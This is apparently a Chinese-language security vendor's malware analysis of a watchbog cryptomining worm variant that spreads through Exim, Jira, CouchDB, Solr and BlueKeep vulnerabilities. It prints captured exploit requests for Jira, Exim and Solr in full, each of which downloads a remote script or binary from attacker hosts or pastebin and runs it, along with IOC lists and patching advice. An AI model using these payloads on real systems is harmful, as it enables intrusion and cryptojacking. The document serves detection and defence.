概述
近日,阿裡雲安全團隊監測到watchbog挖礦蠕蟲的變種。該蠕蟲在原先挖礦功能與C&C通信的基礎上[1],增加了使用多個CVE漏洞進行傳播的能力,利用這些漏洞,攻擊者可以執行任意指令非法牟利或以此為跳闆擴大攻擊範圍,對被入侵主機帶來極大的安全隐患。
本文重點關注watchbog蠕蟲新增加的5種漏洞利用方式,涉及的元件根據shodan與Zoomeye掃描全網量從大到小分别為:Exim、Windows Remote Desktop、CouchDB、Jira、Solr。其中運作Exim服務的裝置達百萬級别,而最少的Solr也有上萬台裝置運作,是以該蠕蟲攻擊覆寫面極廣,提醒使用者及時關注自身裝置運作狀态。
其中Windows Bluekeep RDP | CVE-2019-0708需要特别注意,其危害程度與2017年WannaCry所使用的"永恒之藍"漏洞相當,雖然該蠕蟲隻具備對此漏洞的掃描檢測能力,但近日關于此漏洞的RCE利用已有更多的細節放出,且美國Immunity公司已公開售賣其getshell利用方式,大規模爆發即将到來,提醒使用者及時關注。
本文在後續的内容中,對該蠕蟲相關攻擊子產品做了簡單的分析,并介紹了阿裡雲安全團隊對惡意流量的捕獲情況。根據監測,此蠕蟲還未大範圍傳播,且部分攻擊流量具有間斷性與聚集性的特點,疑似攻擊團夥還在小範圍嘗試。但由于惡意程式本身具備多個漏洞攻擊能力,阿裡雲安全團隊建議使用者參考文末的安全建議,及時對自身機器進行檢查并修複相關漏洞,以防蠕蟲大規模爆發。
蠕蟲主要結構與特點
阿裡雲安全團隊對該蠕蟲進行了追蹤與詳細分析,此蠕蟲的主要特點包括:
- 腳本、挖礦程序名natstat與watchbog具有迷惑性,與Linux自帶程式相似或相同;
- C&C子產品使用python編寫,其餘腳本通過shell實作;
- 内置多種高危遠端代碼執行payload,并以此進行傳播擴散,攻擊面極廣;
- 通過門羅币挖礦牟利。
攻擊者通過多個遠端代碼執行漏洞進行全網掃描,向目标發送惡意指令。指令成功執行後,被入侵主機會向
https://pastebin.com/raw/yS3fAEBN發送請求下載下傳惡意二進制程式并運作。此惡意程式由挖礦子產品與攻擊子產品組成:
挖礦子產品下載下傳挖礦腳本、挖礦配置檔案并維持C&C通信;
- 攻擊子產品進行漏洞探測、payload組裝與漏洞利用,并對其他主機進行攻擊;
- 攻擊者整個攻擊流程如下圖所示:
蠕蟲分析
阿裡雲安全團隊監測到該蠕蟲入侵的主機執行了以下的惡意腳本:
其下載下傳base64編碼的惡意腳本,解碼并執行:
可以看到,該程式将從惡意伺服器pay_url處下載下傳惡意程式并以natstat運作,運作後清理相關痕迹。進一步跟進後發現該蠕蟲從
https://pastebin.com/raw/CfpAvqzT處下載下傳惡意二進制程式。經逆向分析,該程式向
https://pastebin.com/raw/Dj3JTtnj發送請求下載下傳惡意程式至/tmp/baby,此腳本用于挖礦與C&C通信子產品,雖然與之前捕獲的腳本[1]内容不盡相同,但程式核心不變,在這裡不做過多介紹。
繼續分析此惡意程式可以發現,該蠕蟲使用名為jail的工具包,該工具包包含各種漏洞的檢測、驗證、payload生成等功能,可以看到其背後的攻擊團夥具有較高的專業性。
繼續分析惡意程式可以發現,該程式利用多個CVE漏洞進行傳播,除了之前在挖礦程式中常用的redis(CVE-2015-4335/寫入crontab任務)、Jenkins RCE(CVE-2018-1000861)、Nexus RCE(CVE-2019-7238)漏洞之外,該惡意程式更新了攻擊庫,新增了JIRA RCE(CVE-2019-11581)、Exim RCE(CVE-2019-10149)、Couchdb RCE(CVE-2018-8007)、Solr RCE(CVE-2017-12629)以及Windows Remote Desktop RCE(CVE-2019-0708)作為新的傳播途徑。
1. Windows RDP RCE [CVE-2019-0708]
Windows bluekeep是微軟在2019年5月公布的安全漏洞[2],其存在于遠端桌面服務中,攻擊者可以通過RDP協定向開啟了遠端桌面服務的目标發送惡意資料,進而達到任意指令執行的效果。該漏洞在官方的描述中其危害程度與2017年WannaCry所使用的"永恒之藍"漏洞相當,是以需格外注意。
目前,針對此漏洞還未有公開的RCE利用方式流出,隻有Macfee公布了一段成功執行指令的視訊,以及公開的漏洞掃描驗證腳本以及藍屏exp。但近日,該漏洞又有更多細節被安全研究者揭露,而且出售商業化滲透測試套件的美國Immunity公司在twitter上公開售賣該漏洞的getshell腳本[3],一場可以預期的大規模爆發即将到來。
該蠕蟲以zerosum0x0編寫的RDP掃描檢測腳本為基礎,建構了該漏洞的探測子產品,如下圖所示:
此攻擊子產品在RDP協定連接配接建立時,使用了watchbog作為其辨別符,即Cookie: mstshash=watchbog,可以視為其明顯特征。該蠕蟲在完成此掃描過程後,将探測到的存在漏洞主機位址使用RC4加密方式傳回給C&C伺服器,如下圖所示:
目前,尚不清楚此團夥是否已經具備任意代碼執行的能力,但由于該漏洞影響大部分開啟遠端桌面服務的Windows版本且危害極大,是以需要謹慎提防該漏洞利用的大規模到來。
2. JIRA模闆注入RCE [CVE-2019-11581]
Atlassian Jira是一個事務與項目跟蹤軟體,其可以計劃、跟蹤和管理靈活軟體開發項目。攻擊者在最新的蠕蟲中,增加了Jira模闆注入RCE的相關功能,其利用JIRA聯系管理者表單處未授權或具有JIRA管理者通路權限導緻的模闆注入[4]。惡意程式中内置了此攻擊子產品,其嘗試向secure/ContactAdministrators.jspa與secure/ContactAdministrators!default.jspa發送以下payload:
阿裡雲安全團隊已捕獲相關攻擊流量,其向目标url注入#set ($cmd="wget
-O /tmp/baby")指令執行相應的挖礦程式。
同時,攻擊者還嘗試在此漏洞中,插入Apache Struts 2的漏洞利用方式,試圖通過這種"組合拳"的方式,突破目标主機的防禦,轉碼後payload如下:
POST /secure/ContactAdministrators!default.jspa HTTP/1.1
Content-Type: application/xml
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 5650
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
<map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> 除此之外,平台還發現疑似其他團夥使用此漏洞向
http://107.174.47.181/mr.sh下載下傳kworkerds挖礦程式,payload如下:
POST /secure/ContactAdministrators.jspa HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.1
Content-Length: 424
Content-Type: application/x-www-form-urlencoded
atl_token=BCGK-NYLC-7KR7-6QGO_50a98ffe7dbf772ae9325186d08a20e190e13aed_lout&[email protected]&details=v&subject=$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('bash -c {echo,Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xODEvbXIuc2ggfCBiYXNoIC1zaA==}|{base64,-d}|{bash,-i}').toString() 可以看到,此漏洞已逐漸被惡意團夥所利用,甚至在惡意團夥之間進行傳播,給使用者帶來更大的安全威脅。是以,阿裡雲安全團隊建議受影響的使用者及時修複漏洞,以防攻擊面加速擴大以及漏洞利用方式更新。
3. Exim Mail RCE [CVE-2019-10149]
Exim是一款開源郵件傳輸代理伺服器軟體,在4.87-4.91版本的Exim中,deliver_message函數未對郵件接收者的位址做限制,導緻攻擊者可以向本地域localhost或其他本地域發送攻擊${run{...}}@localhost形式的payload,執行任意指令[5]。在該蠕蟲中,其内置了相關payload:
阿裡雲安全團隊已監測到相關攻擊流量,其轉碼後結果如下圖。攻擊者正利用此漏洞進行傳播,但數量較小,且惡意源較為集中,疑似攻擊者還正在進行小範圍嘗試。
除此之外,阿裡雲安全團隊還監測出其他攻擊者也正在使用此漏洞進行嘗試,下載下傳惡意程式并寫入反彈shell,轉碼後payload如下:
RCPT TO:<${run{/bin/sh -c 'mount -o remount,exec /dev/shm; cd /dev/shm;(wget http://212.83.186.24:2525/fsflt||(echo fsflt|nc -q 1 212.83.186.24 2525)>fsflt||(exec 10<>/dev/tcp/212.83.186.24/2525;echo fsflt>&10;cat <&10>fsflt)) & sleep 45;setsid sh fsflt 47.90.89.47 25 trulifeaudio.com'&}}@localhost> 根據Shodan全網掃描結果可以看到,Exim僅4.91版本就有67w台裝置,可以預見,此漏洞的影響面極其廣泛,建議使用版本在4.87-4.91的使用者及時更新元件,以防止不必要的損失。
4. Couchdb RCE [CVE-2018-8007]
Apache CouchDB是一個開源資料庫,專注于易用性與web資料庫的相容性。在CVE-2018-8007漏洞中,攻擊者可以通過couchDB提供的HTTP API配置擷取作業系統使用者權限,進而執行惡意指令[6],其向_config/update_notification/index-updater路徑PUT發送内容,進而達到任意代碼執行的功能。
阿裡雲安全團隊監測到的此種攻擊流量如下圖所示:
根據監測的結果顯示,目前使用此漏洞進行攻擊的流量較少,但此攻擊子產品内置于惡意程式之中,尚未爆發,仍需謹慎對待,及時修複相關漏洞,以防事态進一步擴大。
5. Solr RCE [CVE-2017-12629]
Apache Solr是開源企業搜尋平台,主要包括全文搜尋、動态聚類、富文本處理等功能。該蠕蟲利用SolrCloud Collections API,在config字段中傳入solr.RunExecutableListener,進而達到任意指令執行的操作[7]。該蠕蟲在内部内置了相關攻擊子產品,如下:
阿裡雲安全團隊監測到的惡意流量payload如下:
POST /solr/query_solr/config HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Content-Type: application/json
Content-Length: 211
{"create-listener": {"exe": "sh", "name": "newlistener-036", "args": ["-c", "nohup bash -c (curl -fsSL https://pastebin.com/raw/yS3fAEBN||wget -q -O- https://pastebin.com/raw/yS3fAEBN)|base64 -d|bash
"], "event": "newSearcher", "class": "solr.RunExecutableListener", "dir": "/bin/"}} 該蠕蟲涉及使用的其他3種漏洞:Nexus Repository Manager[1]、Redis[8]與Jenkins[9]遠端代碼執行在阿裡雲安全團隊的其他文章中已經進行了詳細的分析,遭受相關漏洞困擾的使用者,可以根據相關文章的安全建議進行修複,在這裡不再贅述。
涉及漏洞
IOC
MD5
natstat: bc7a55426cd26a431879fbb9ea36c42d
URL
- https://pastebin.com/raw/p3mGdbpq
- https://pastebin.com/raw/UeynzXEr
- https://pastebin.com/raw/MMCFQMH9
- https://pastebin.com/raw/EzqVke6X
安全建議
- 由于涉及多個元件,使用相關元件的使用者建議及時更新相關元件至最新版本
- 建議使用阿裡雲安全的下一代雲防火牆産品,集中管理公網IP的通路政策,其内置威脅入侵防禦子產品(IPS),支援失陷主機檢測、主動外聯行為的阻斷,還可根據需求,靈活、快速、高效地更改配置防禦規則,保證業務穩定安全運作。
- 若您關注自身業務網絡安全但卻無從下手,推薦使用阿裡雲安全管家服務,其為您配備具有多年雲上安全最佳實踐經驗的安全專家,提供7×24小時的服務響應級别,保障網絡及重要系統在任何時間發生任何安全問題都能夠及時得到支援和救援。
相關文章
[1] Nexus Repository Manager 3新漏洞已被用于挖礦木馬傳播,建議使用者盡快修複
[2] Remote Desktop Services Remote Code Execution Vulnerability
[3] 美國Immunity公司公開售賣Bluekeep漏洞利用
[4] JIRA Security Advisory 2019-07-10
[5] Exim 遠端代碼執行漏洞
[6] CVE-2018-8007: Apache CouchDB Remote Code Execution
[7] Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution
[8] Watchdogs利用Redis實施大規模挖礦,常見資料庫蠕蟲如何破?
[9] Jenkins RCE漏洞成ImposterMiner挖礦木馬新"跳闆"